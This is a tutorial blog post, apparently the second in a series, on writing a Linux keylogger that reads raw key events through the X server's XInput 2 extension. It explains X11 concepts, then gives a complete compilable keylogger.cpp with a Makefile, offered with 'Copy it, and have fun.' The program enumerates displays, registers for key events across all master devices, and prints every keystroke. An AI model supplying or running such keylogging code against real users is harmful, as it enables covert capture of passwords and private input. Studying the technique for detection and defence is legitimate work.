24.Key Code
In Complete Guide to Keylogging in Linux: Part 1, we covered how a keylogger can be written for Linux by reading events directly from the keyboard device. Today, we will cover a slightly different technique for capturing keyboard events.

 Linux GUI Stack

Unlike in other operating systems such as Windows, the GUI is not part of the Linux OS itself. Instead, it is managed by a stack of applications, libraries and protocols. A generic stack looks something like this:

    +---------------+                                      +--------------+
    |   Display:2   |<--=---+                    +----=--->|   WxWidget   |-----+
    +---------------+       |                    |         +--------------+     |
                            |                    |                              |
    +---------------+       |                    |         +--------------+     |
    |   Display:1   |<--=---+                    +----=--->|      Qt      |-----+
    +---------------+       |                    |         +--------------+     |
                            |                    |                              |
    +---------------+       |                    |         +--------------+     |
    |   Display:0   |<--=---+                    +----=--->|     GTK+     |-----+
    +---------------+       |                    |         +--------------+     |
                            |                    |                              |
                            |                    |                              |
     update   +-------------+--+  ---=---> +-----+--------+   send data         |
    +------=--|    X Server    |           |     xlib     |<-------------=------+
    | screen  +----------------+  <--=---- +--------------+   ask to repaint
    |             ^
    |             | events
    |   +---------+----------------+
    +-->|       Linux Kernel       |
        +--------------------------+
 
Here, the X server sits between the GUI and the OS, and is responsible for providing various primitives. It implements the "windows, icons, menus, pointer" paradigm, which is the bread and butter of a GUI system. The protocol understood by the X server is network oriented (which means you can draw the screen on a completely different system from the one on which the application is running) and is extensible by design. GUI toolkits such as GTK+, Qt and wxWidgets use X client libraries such as Xlib (these wrap the protocol behind "user friendly" functions) to draw the controls they provide. Applications then use these toolkits to design their own UIs. Generally, these applications run on some desktop environment, which implements the "traditional" desktop elements (launcher, wallpaper, etc.) and controls (e.g. drag and drop).
 

X Server Terminology

 
Since the X server uses non-intuitive terminology, let us go through some of its terms before proceeding further:
 
**display**: A "display" is just an X server somewhere.
 
**screen**: A "screen" is a virtual framebuffer associated with a "display". A display may have more than one screen.
 
**monitor**: This is the physical monitor on which the framebuffer is drawn. Generally, a screen is mapped to one monitor, but that is not universally true. It is possible to have two monitors showing the same screen, as in a mirrored display, or to use two smaller monitors with one huge screen (where different parts of the screen land on different monitors).
 
**root window**: This is the window in which everything else is drawn. It is the root node of the window tree.
 
**virtual core device**: The X server always has two virtual core devices: a pointer (mouse) and a keyboard. These devices do not depend on the presence of a physical input device, and do not generate any events on their own. They are also called master devices. They are designed to provide core events in a range that matches the display resolution. At the same time, they also generate events in the device-specific resolution (if applicable). Clients that register for XInput Extension events receive events in this native resolution. Clients that open physical devices ("slave devices") directly and register for events do not receive core events. A slave device cannot generate core events.
 

Keylogging in X Server

The basic way of input capture can be summarised as below:
 
- Check if X server is running.
- Enumerate available displays.
- Open desired display.
- Check if XInputExtension is available.
- Set the event mask to enable key press and key release events.
- Read events from the display in a loop.
 

Enumerating displays

By convention, when the X server is running, it creates a socket file in `/tmp/.X11-unix/` for each display. The file names follow the common pattern `X<digits>`, where `:<digits>` is the display name. We can enumerate this directory and try to open each candidate display to confirm that the socket files do indeed belong to an X server.
 
The sample code for enumeration is as below:

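std::vector<std::string> EnumerateDisplay()
{
  std::vector<std::string> displays;
 
  // The error_code overload does not throw: if the directory is missing
  // (no X server running), the loop body simply never executes
  std::error_code ec;
  for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix", ec))
  {
    std::string path = p.path().filename().string();
    std::string display_name = ":";
   
    // Socket files are named X<digits>; skip anything else
    if (path.empty() || path[0] != 'X') continue;
   
    // "X0" becomes ":0"
    path.erase(0, 1);
    display_name.append(path);
   
    // Being able to open the display confirms that an X server owns the socket
    Display *disp = XOpenDisplay(display_name.c_str());
    if (disp != NULL)
    {
      int count = XScreenCount(disp);
      printf("Display %s has %d screens\n",
        display_name.c_str(), count);

      // Print the dimensions of every screen on this display
      for (int i = 0; i < count; i++)
        printf(" %d: %dx%d\n",
          i, XDisplayWidth(disp, i), XDisplayHeight(disp, i));

      XCloseDisplay(disp);
     
      displays.push_back(display_name);
    }
  }
 
  return displays;
}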
As you can see, we are enumerating screens and their dimensions for each detected display. If you run this, you will see output similar to:
 

Display :0 has 1 screens
 0: 1920x1080
 
Here, I have only one screen associated with the display, and its dimensions are 1920x1080.
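
The enumeration code above accepts any file whose name starts with `X`. If you want to match the `X<digits>` pattern more strictly before trying to open a display, a check along the following lines should work. This is only a sketch: `DisplayNameFromSocket` is a hypothetical helper name of my own, not part of Xlib or of the code in this post.

```cpp
#include <algorithm>
#include <cctype>
#include <optional>
#include <string>

// Hypothetical helper (not part of Xlib or the original code): map a socket
// file name such as "X0" to the display name ":0". Returns std::nullopt for
// anything that is not 'X' followed by one or more decimal digits.
std::optional<std::string> DisplayNameFromSocket(const std::string &file_name)
{
    // Need at least "X" plus one digit
    if (file_name.size() < 2 || file_name[0] != 'X')
        return std::nullopt;

    // Everything after the leading 'X' must be a decimal digit
    const bool all_digits = std::all_of(
        file_name.begin() + 1, file_name.end(),
        [](unsigned char c) { return std::isdigit(c) != 0; });
    if (!all_digits)
        return std::nullopt;

    return ":" + file_name.substr(1);
}
```

With this helper, `X0` maps to `:0`, while names such as `X` or `X0.lock` are rejected without ever calling `XOpenDisplay`.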
 

Detecting XInputExtension 

We can use `XQueryExtension` to check whether a given extension is available on the selected display. Since extensions may change their behaviour in future, it is a good idea to limit ourselves to specific versions against which we have tested our code. In this example, we will stick to version 2.0 of XInputExtension.
 
The code snippet for the above is as below:
 

// Set up X
Display * disp = XOpenDisplay(hostname);
if (NULL == disp)
{
    std::cerr << "Cannot open X display: " << hostname << std::endl;
    exit(1);
}
 
// Test for XInput 2 extension
int xiOpcode, queryEvent, queryError;
if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) 
{
    std::cerr << "X Input extension not available" << std::endl;
    exit(2);
}
// Request XInput 2.0, guarding against changes in future versions
int major = 2, minor = 0;
int queryResult = XIQueryVersion(disp, &major, &minor);
if (queryResult == BadRequest) 
{
    std::cerr << "Need XI 2.0 support (got " << major << "." << minor << ")" << std::endl;
    exit(3);
}
else if (queryResult != Success) 
{
    std::cerr << "Internal error" << std::endl;
    exit(4);
}

Registering for events

To get specific events from the X server, we have to tell it which events we are interested in by setting an event mask. The mask is defined as below:
 

typedef struct {
    int deviceid;
    int mask_len;
    unsigned char* mask;
} XIEventMask;
 
If deviceid is a valid device, the event mask is selected only for this device. If deviceid is XIAllDevices or XIAllMasterDevices, the event mask is selected for all devices or all master devices, respectively. The effective event mask is the bit-wise OR of the XIAllDevices, XIAllMasterDevices and the respective device's event mask.
 
The mask_len specifies the length of mask in bytes.
 
The mask itself is a bit mask, in which each event type is represented by the bit (1 << event type).
 
The mask can be set as below:
 

Window root = DefaultRootWindow(disp);
 
XIEventMask m;
m.deviceid = XIAllMasterDevices;
m.mask_len = XIMaskLen(XI_LASTEVENT);
m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
XISetMask(m.mask, XI_RawKeyPress);
XISetMask(m.mask, XI_RawKeyRelease);
 
XISelectEvents(disp, root, &m, 1);
XSync(disp, false);
free(m.mask);
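
To make the bit layout concrete, here is a minimal sketch of what `XIMaskLen` and `XISetMask` do, as far as I understand the macros in the XInput2 headers: event type N ends up as bit N % 8 of byte N / 8. The names `MaskLen`, `SetMask`, `MaskIsSet` and `BuildRawKeyMask` are illustrative stand-ins of my own so that the example compiles without the X11 headers, and the numeric values for the two raw key events are assumptions that you should verify against your own `XI2.h`.

```cpp
#include <cstddef>
#include <vector>

// Assumed values of XI_RawKeyPress and XI_RawKeyRelease (check XI2.h)
constexpr int kRawKeyPress = 13;
constexpr int kRawKeyRelease = 14;

// Stand-in for XIMaskLen: number of bytes needed to hold bit `highest_event`
std::size_t MaskLen(int highest_event)
{
    return static_cast<std::size_t>(highest_event >> 3) + 1;
}

// Stand-in for XISetMask: set the bit that belongs to `event`
void SetMask(std::vector<unsigned char> &mask, int event)
{
    mask[event >> 3] |= static_cast<unsigned char>(1u << (event & 7));
}

// Stand-in for XIMaskIsSet: test the bit that belongs to `event`
bool MaskIsSet(const std::vector<unsigned char> &mask, int event)
{
    return (mask[event >> 3] & (1u << (event & 7))) != 0;
}

// Build a zeroed mask just large enough for the two raw key events
std::vector<unsigned char> BuildRawKeyMask()
{
    std::vector<unsigned char> mask(MaskLen(kRawKeyRelease), 0);
    SetMask(mask, kRawKeyPress);
    SetMask(mask, kRawKeyRelease);
    return mask;
}
```

Under these assumptions the mask is two bytes long, and both events land in the second byte. The real code sizes the mask with `XI_LASTEVENT` instead, which leaves room for every event type known to the installed headers.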
 

Reading Events

The event data arrives in an `XGenericEventCookie` object, which is defined as below:
 

typedef struct {
    int type;
    unsigned long serial;
    Bool send_event;
    Display *display;
    int extension;
    int evtype;
    unsigned int cookie;
    void *data;
} XGenericEventCookie; 
 
For keyboard events, `type` will be _GenericEvent_, `extension` will be _xiOpcode_, `evtype` will be _XI_RawKeyRelease_ or _XI_RawKeyPress_, and `data` will point to an `XIRawEvent` object once `XGetEventData()` has succeeded.
 
To read the events, we need to do the following in a loop:
 
- Take event using `XNextEvent()`
- Check that the event is the one we are interested in (by verifying the values of its fields)
- Read the event data
 
The code for the loop is as below:
 

while (true) 
{
    XEvent event;
    XNextEvent(disp, &event);
    XGenericEventCookie *cookie = &event.xcookie;
 
    // Only XInput 2 generic events carry the data we want
    if (cookie->type != GenericEvent ||
            cookie->extension != xiOpcode ||
            !XGetEventData(disp, cookie))
        continue;
 
    switch (cookie->evtype)
    {
        case XI_RawKeyRelease:
        case XI_RawKeyPress: 
        {
            XIRawEvent *ev = (XIRawEvent*)cookie->data;
 
            // Ask X what it calls that key
            KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
            char *str = (NoSymbol == s) ? NULL : XKeysymToString(s);
 
            if (NULL != str)
                std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-") << str << " " << std::flush;
            break;
        }
    }
 
    // Data obtained through XGetEventData() must always be released
    XFreeEventData(disp, cookie);
}
 
If you compare this code with the keylogger code in the previous blog post, you will see that we no longer have to map scan codes to actual keys on the keyboard manually. We let the X server do the heavy lifting of dealing with the applicable keyboard layouts, and of correctly mapping scan codes to keys on the current layout (something we did not bother handling in the previous post, because it is a headache).
 

Complete Code

For the sake of completeness, I am including the whole code here. Copy it, and have fun.
 

keylogger.cpp 


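#include <X11/Xlib.h>
#include <X11/XKBlib.h>
#include <X11/extensions/XInput2.h>

#include <filesystem>
#include <system_error>

#include <cstdio>
#include <cstdlib>
#include <cstring>
#include <iostream>
#include <string>
#include <vector>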
 
int printUsage(std::string application_name) 
{
    std::cout << "USAGE: " << application_name << " [-display <display>] [-enumerate] [-help]" << std::endl;
    std::cout << "display      target X display                   (default :0)" << std::endl;
    std::cout << "enumerate    enumerate all X11 displays" << std::endl;
    std::cout << "help         print this information and exit" << std::endl;
 
    exit(0);
}
 
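std::vector<std::string> EnumerateDisplay()
{
    std::vector<std::string> displays;
    
    // The error_code overload does not throw: if the directory is missing
    // (no X server running), the loop body simply never executes
    std::error_code ec;
    for (auto &p : std::filesystem::directory_iterator("/tmp/.X11-unix", ec))
    {
        std::string path = p.path().filename().string();
        std::string display_name = ":";
        
        // Socket files are named X<digits>; skip anything else
        if (path.empty() || path[0] != 'X') continue;
        
        // "X0" becomes ":0"
        path.erase(0, 1);
        display_name.append(path);
        
        // Being able to open the display confirms that an X server owns the socket
        Display *disp = XOpenDisplay(display_name.c_str());
        if (disp != NULL) 
        {
            int count = XScreenCount(disp);
            printf("Display %s has %d screens\n",
                display_name.c_str(), count);
 
            // Print the dimensions of every screen on this display
            for (int i = 0; i < count; i++)
                printf(" %d: %dx%d\n",
                    i, XDisplayWidth(disp, i), XDisplayHeight(disp, i));
 
            XCloseDisplay(disp);
            
            displays.push_back(display_name);
        }
    }
    
    return displays;
}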
 
int main(int argc, char * argv[])
{
    const char * hostname    = ":0";
 
    // Get arguments
    for (int i = 1; i < argc; i++)
    {
        if      (!strcmp(argv[i], "-help"))
            printUsage(argv[0]);
        else if (!strcmp(argv[i], "-display") && i + 1 < argc)  // needs a value after it
            hostname    = argv[++i];
        else if (!strcmp(argv[i], "-enumerate"))
        {
            EnumerateDisplay();
            return 0;
        }
        else
        { 
            std::cerr << "Unknown argument: " << argv[i] << std::endl;
            printUsage(argv[0]); 
        }
    }
 
    // Set up X
    Display * disp = XOpenDisplay(hostname);
    if (NULL == disp)
    {
        std::cerr << "Cannot open X display: " << hostname << std::endl;
        exit(1);
    }
 
    // Test for XInput 2 extension
    int xiOpcode, queryEvent, queryError;
    if (! XQueryExtension(disp, "XInputExtension", &xiOpcode, &queryEvent, &queryError)) 
    {
        std::cerr << "X Input extension not available" << std::endl;
        exit(2);
    }
    { // Request XInput 2.0, guarding against changes in future versions
        int major = 2, minor = 0;
        int queryResult = XIQueryVersion(disp, &major, &minor);
        if (queryResult == BadRequest) 
        {
            std::cerr << "Need XI 2.0 support (got " << major << "." << minor << ")" << std::endl;
            exit(3);
        }
        else if (queryResult != Success) 
        {
            std::cerr << "Internal error" << std::endl;
            exit(4);
        }
    }
 
    // Register events
    Window root = DefaultRootWindow(disp);
    
    XIEventMask m;
    m.deviceid = XIAllMasterDevices;
    m.mask_len = XIMaskLen(XI_LASTEVENT);
    m.mask = (unsigned char*)calloc(m.mask_len, sizeof(char));
    XISetMask(m.mask, XI_RawKeyPress);
    XISetMask(m.mask, XI_RawKeyRelease);
    
    XISelectEvents(disp, root, &m, 1);
    XSync(disp, false);
    free(m.mask);
 
    while (true) 
    {
        XEvent event;
        XNextEvent(disp, &event);
        XGenericEventCookie *cookie = &event.xcookie;
 
        // Only XInput 2 generic events carry the data we want
        if (cookie->type != GenericEvent ||
                cookie->extension != xiOpcode ||
                !XGetEventData(disp, cookie))
            continue;
 
        switch (cookie->evtype)
        {
            case XI_RawKeyRelease:
            case XI_RawKeyPress: 
            {
                XIRawEvent *ev = (XIRawEvent*)cookie->data;
 
                // Ask X what it calls that key
                KeySym s = XkbKeycodeToKeysym(disp, ev->detail, 0, 0);
                char *str = (NoSymbol == s) ? NULL : XKeysymToString(s);
 
                if (NULL != str)
                    std::cout << (cookie->evtype == XI_RawKeyPress ? "+" : "-") << str << " " << std::flush;
                break;
            }
        }
 
        // Data obtained through XGetEventData() must always be released
        XFreeEventData(disp, cookie);
    }
}
 

Makefile


keylogger: keylogger.cpp
	$(CXX) --std=c++17 -pedantic -Wall -O0 -ggdb -o keylogger keylogger.cpp -lX11 -lXi
clean:
	rm --force keylogger

Have fun, and stay tuned for Part 3 of this series coming soon!
 

About the Author

Adhokshaj Mishra works as a security researcher (malware - Linux) at Uptycs. His interest lies in the offensive and defensive sides of Linux malware research. He has been working on attacks related to containers and Kubernetes, and on various techniques to write better malware targeting the Linux platform. In his free time, he loves to dabble in applied cryptography and to present his work at various security meetups and conferences.